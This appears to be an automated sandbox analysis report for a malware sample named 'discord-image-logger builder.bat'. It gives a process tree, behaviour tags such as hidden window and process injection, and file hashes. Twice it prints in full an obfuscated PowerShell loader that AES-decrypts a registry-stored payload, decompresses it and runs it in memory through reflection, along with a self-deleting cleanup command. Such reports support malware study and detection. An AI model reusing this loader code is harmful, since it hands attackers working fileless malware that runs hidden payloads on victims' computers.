$ovPeB.CopyTo($yWMQI); $ovPeB.Dispose(); $JuLib.Dispose(); $yWMQI.Dispose(); $yWMQI.ToArray();}function LWfQc($CAUyg,$FEAph){ $ABDeF=[System.Reflection.Assembly]::Load([byte[]]$CAUyg); $WyGRR=$ABDeF.EntryPoint; $WyGRR.Invoke($null, $FEAph);}$UaEuB1 = New-Object System.Security.Cryptography.AesManaged;$UaEuB1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UaEuB1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UaEuB1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk=');$UaEuB1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ==');$PwPCN = $UaEuB1.('rotpyrceDetaerC'[-1..-15] -join '')();$GCidc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XSkKpx7QoQiF0BsaqEtF9g==');$GCidc = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc, 0, $GCidc.Length);$GCidc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc);$hbuWR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2Ib4CeUG3V15LN/pc/Lrm4LCmpRZWn3AV06VFawX7o=');$hbuWR = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hbuWR, 0, $hbuWR.Length);$hbuWR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hbuWR);$ZzVHZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XLxMpEm8cOctcAJWUeWXmQ==');$ZzVHZ = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZzVHZ, 0, $ZzVHZ.Length);$ZzVHZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZzVHZ);$zmDYn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x//PQ4u8mfYZiPHe2OGfrd00QBKiDvcEzPaDrYozv8uYedand6uL0wzlN+5O+AFhCoQAKBv651U3V0221QDxAvpv3KCyoJoReYXVHf6P7M/KyX5+2eOQjYEjFwTGbUjMLAybGiiaRNU03vlqAT7agKum7o1H6WfH+N764uOSYGL3HIdf7WKB0TMZlcqkVcZ4EbttcZsQjZV1vkCPbJt39bdJJTOLlHC5/EHgOLRlT+W3G+02exnNVSpXP20jdKzqezuTgmjWtvyJkL9/lFJG3FHUGehTiuT3ar2yFCKi4/OkHCw1z1DGbDJvEtWfauUaRRol3S/UgNocMBrJOXX+Aw0PMubGj40DP02/Mw4JY8R/V/7YpQkEP43UqopfbI11ciWaaIn/nKzAOZ+bXBTY5L+DxT8LfXRiRGkrI1/LwcQ=');$zmDYn = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zmDYn, 0, $zmDYn.Length);$zmDYn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zmDYn);$nTpTd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW2EL3qe/ZOARS0s/ML1EA==');$nTpTd = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nTpTd, 0, $nTpTd.Length);$nTpTd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nTpTd);$snbQC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2AgSI40erquiJx027xjhrA==');$snbQC = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($snbQC, 0, $snbQC.Length);$snbQC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($snbQC);$qxpKv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2iK7UtzUwrolEWaIcQUhnQ==');$qxpKv = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qxpKv, 0, $qxpKv.Length);$qxpKv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qxpKv);$AJQNv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KrSM+woEOB3Vezss7LVo2Q==');$AJQNv = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AJQNv, 0, $AJQNv.Length);$AJQNv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AJQNv);$AfXGh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Wjsjcy3SC8ri3a9Bw4QkA==');$AfXGh = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AfXGh, 0, $AfXGh.Length);$AfXGh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AfXGh);$GCidc0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zah5Ks6KFV7nxV/Lj1cbNA==');$GCidc0 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc0, 0, $GCidc0.Length);$GCidc0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc0);$GCidc1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3d2GFulV4IACfF1Solw09Q==');$GCidc1 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc1, 0, $GCidc1.Length);$GCidc1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc1);$GCidc2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dmoVWHHHBRJhscv9vH7d+Q==');$GCidc2 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc2, 0, $GCidc2.Length);$GCidc2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc2);$GCidc3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Yy1MO8gEwf8dMKODGTzF5g==');$GCidc3 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc3, 0, $GCidc3.Length);$GCidc3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc3);$PwPCN.Dispose();$UaEuB1.Dispose();if (@(get-process -ea silentlycontinue $GCidc3).count -gt 1) {exit};$UtsnC = [Microsoft.Win32.Registry]::$AJQNv.$qxpKv($GCidc).$snbQC($hbuWR);$VFMJc=[string[]]$UtsnC.Split('\');$rhtBQ=XNrXq(OONaJ([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFMJc[1])));LWfQc $rhtBQ (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NvzQg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFMJc[0]);$UaEuB = New-Object System.Security.Cryptography.AesManaged;$UaEuB.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UaEuB.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UaEuB.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk=');$UaEuB.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ==');$hVJMW = $UaEuB.('rotpyrceDetaerC'[-1..-15] -join '')();$NvzQg = $hVJMW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NvzQg, 0, $NvzQg.Length);$hVJMW.Dispose();$UaEuB.Dispose();$JuLib = New-Object System.IO.MemoryStream(, $NvzQg);$yWMQI = New-Object System.IO.MemoryStream;$ovPeB = New-Object System.IO.Compression.GZipStream($JuLib, [IO.Compression.CompressionMode]::$GCidc1);$ovPeB.$AfXGh($yWMQI);$ovPeB.Dispose();$JuLib.Dispose();$yWMQI.Dispose();$NvzQg = $yWMQI.ToArray();$fcYPL = $zmDYn | IEX;$ABDeF = $fcYPL::$GCidc2($NvzQg);$WyGRR = $ABDeF.EntryPoint;$WyGRR.$GCidc0($null, (, [string[]] ($ZzVHZ)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(64).WaitForExit();[System.Threading.Thread]::Sleep(5000); function OONaJ($CAUyg){ $UaEuB=[System.Security.Cryptography.Aes]::Create(); $UaEuB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $UaEuB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $UaEuB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk='); $UaEuB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ=='); $hVJMW=$UaEuB.('rotpyrceDetaerC'[-1..-15] -join '')(); $dSUQC=$hVJMW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CAUyg, 0, $CAUyg.Length); $hVJMW.Dispose(); $UaEuB.Dispose(); $dSUQC;}function XNrXq($CAUyg){ $JuLib=New-Object System.IO.MemoryStream(,$CAUyg); $yWMQI=New-Object System.IO.MemoryStream; $ovPeB=New-Object System.IO.Compression.GZipStream($JuLib, [IO.Compression.CompressionMode]::Decompress); $ovPeB.CopyTo($yWMQI); $ovPeB.Dispose(); $JuLib.Dispose(); $yWMQI.Dispose(); $yWMQI.ToArray();}function LWfQc($CAUyg,$FEAph){ $ABDeF=[System.Reflection.Assembly]::Load([byte[]]$CAUyg); $WyGRR=$ABDeF.EntryPoint; $WyGRR.Invoke($null, $FEAph);}$UaEuB1 = New-Object System.Security.Cryptography.AesManaged;$UaEuB1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UaEuB1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UaEuB1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk=');$UaEuB1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ==');$PwPCN = $UaEuB1.('rotpyrceDetaerC'[-1..-15] -join '')();$GCidc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XSkKpx7QoQiF0BsaqEtF9g==');$GCidc = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc, 0, $GCidc.Length);$GCidc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc);$hbuWR = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2Ib4CeUG3V15LN/pc/Lrm4LCmpRZWn3AV06VFawX7o=');$hbuWR = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hbuWR, 0, $hbuWR.Length);$hbuWR = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hbuWR);$ZzVHZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XLxMpEm8cOctcAJWUeWXmQ==');$ZzVHZ = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZzVHZ, 0, $ZzVHZ.Length);$ZzVHZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZzVHZ);$zmDYn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x//PQ4u8mfYZiPHe2OGfrd00QBKiDvcEzPaDrYozv8uYedand6uL0wzlN+5O+AFhCoQAKBv651U3V0221QDxAvpv3KCyoJoReYXVHf6P7M/KyX5+2eOQjYEjFwTGbUjMLAybGiiaRNU03vlqAT7agKum7o1H6WfH+N764uOSYGL3HIdf7WKB0TMZlcqkVcZ4EbttcZsQjZV1vkCPbJt39bdJJTOLlHC5/EHgOLRlT+W3G+02exnNVSpXP20jdKzqezuTgmjWtvyJkL9/lFJG3FHUGehTiuT3ar2yFCKi4/OkHCw1z1DGbDJvEtWfauUaRRol3S/UgNocMBrJOXX+Aw0PMubGj40DP02/Mw4JY8R/V/7YpQkEP43UqopfbI11ciWaaIn/nKzAOZ+bXBTY5L+DxT8LfXRiRGkrI1/LwcQ=');$zmDYn = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zmDYn, 0, $zmDYn.Length);$zmDYn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zmDYn);$nTpTd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW2EL3qe/ZOARS0s/ML1EA==');$nTpTd = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nTpTd, 0, $nTpTd.Length);$nTpTd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nTpTd);$snbQC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2AgSI40erquiJx027xjhrA==');$snbQC = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($snbQC, 0, $snbQC.Length);$snbQC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($snbQC);$qxpKv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2iK7UtzUwrolEWaIcQUhnQ==');$qxpKv = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qxpKv, 0, $qxpKv.Length);$qxpKv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qxpKv);$AJQNv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KrSM+woEOB3Vezss7LVo2Q==');$AJQNv = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AJQNv, 0, $AJQNv.Length);$AJQNv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AJQNv);$AfXGh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Wjsjcy3SC8ri3a9Bw4QkA==');$AfXGh = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AfXGh, 0, $AfXGh.Length);$AfXGh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AfXGh);$GCidc0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zah5Ks6KFV7nxV/Lj1cbNA==');$GCidc0 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc0, 0, $GCidc0.Length);$GCidc0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc0);$GCidc1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3d2GFulV4IACfF1Solw09Q==');$GCidc1 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc1, 0, $GCidc1.Length);$GCidc1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc1);$GCidc2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dmoVWHHHBRJhscv9vH7d+Q==');$GCidc2 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc2, 0, $GCidc2.Length);$GCidc2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc2);$GCidc3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Yy1MO8gEwf8dMKODGTzF5g==');$GCidc3 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc3, 0, $GCidc3.Length);$GCidc3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc3);$PwPCN.Dispose();$UaEuB1.Dispose();if (@(get-process -ea silentlycontinue $GCidc3).count -gt 1) {exit};$UtsnC = [Microsoft.Win32.Registry]::$AJQNv.$qxpKv($GCidc).$snbQC($hbuWR);$VFMJc=[string[]]$UtsnC.Split('\');$rhtBQ=XNrXq(OONaJ([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFMJc[1])));LWfQc $rhtBQ (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NvzQg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFMJc[0]);$UaEuB = New-Object System.Security.Cryptography.AesManaged;$UaEuB.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UaEuB.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UaEuB.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk=');$UaEuB.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ==');$hVJMW = $UaEuB.('rotpyrceDetaerC'[-1..-15] -join '')();$NvzQg = $hVJMW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NvzQg, 0, $NvzQg.Length);$hVJMW.Dispose();$UaEuB.Dispose();$JuLib = New-Object System.IO.MemoryStream(, $NvzQg);$yWMQI = New-Object System.IO.MemoryStream;$ovPeB = New-Object System.IO.Compression.GZipStream($JuLib, [IO.Compression.CompressionMode]::$GCidc1);$ovPeB.$AfXGh($yWMQI);$ovPeB.Dispose();$JuLib.Dispose();$yWMQI.Dispose();$NvzQg = $yWMQI.ToArray();$fcYPL = $zmDYn | IEX;$ABDeF = $fcYPL::$GCidc2($NvzQg);$WyGRR = $ABDeF.EntryPoint;$WyGRR.$GCidc0($null, (, [string[]] ($ZzVHZ)))5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat.exe"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5480 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Suspicious use of SetWindowsHookEx
PID:5496
-
-
C:\Windows\system32\PING.EXEPING localhost -n 85⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5600
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5728
-
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat.exe"5⤵
- Views/modifies file attributes
PID:5812
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3568
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3748
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3904
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3928
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:4820
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:5000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4172
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1636
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3364
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3604
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1124
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:3496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3948
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:840
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:432
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:464
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
1.8MB
MD57873612dddd9152d70d892427bc45ef0
SHA1ab9079a43a784471ca31c4f0a34b698d99334dfa
SHA256203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf
SHA512d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083
-
Filesize
52KB
MD59ef28981adcbf4360de5f11b8f4ecff9
SHA1219aaa1a617b1dfa36f3928bd1020e410666134f
SHA2568caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a
SHA512ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c
-
Filesize
162KB
MD5a366d6623c14c377c682d6b5451575e6
SHA1a8894fcfb3aa06ad073b1f581b2e749b54827971
SHA2567ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6
SHA512cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11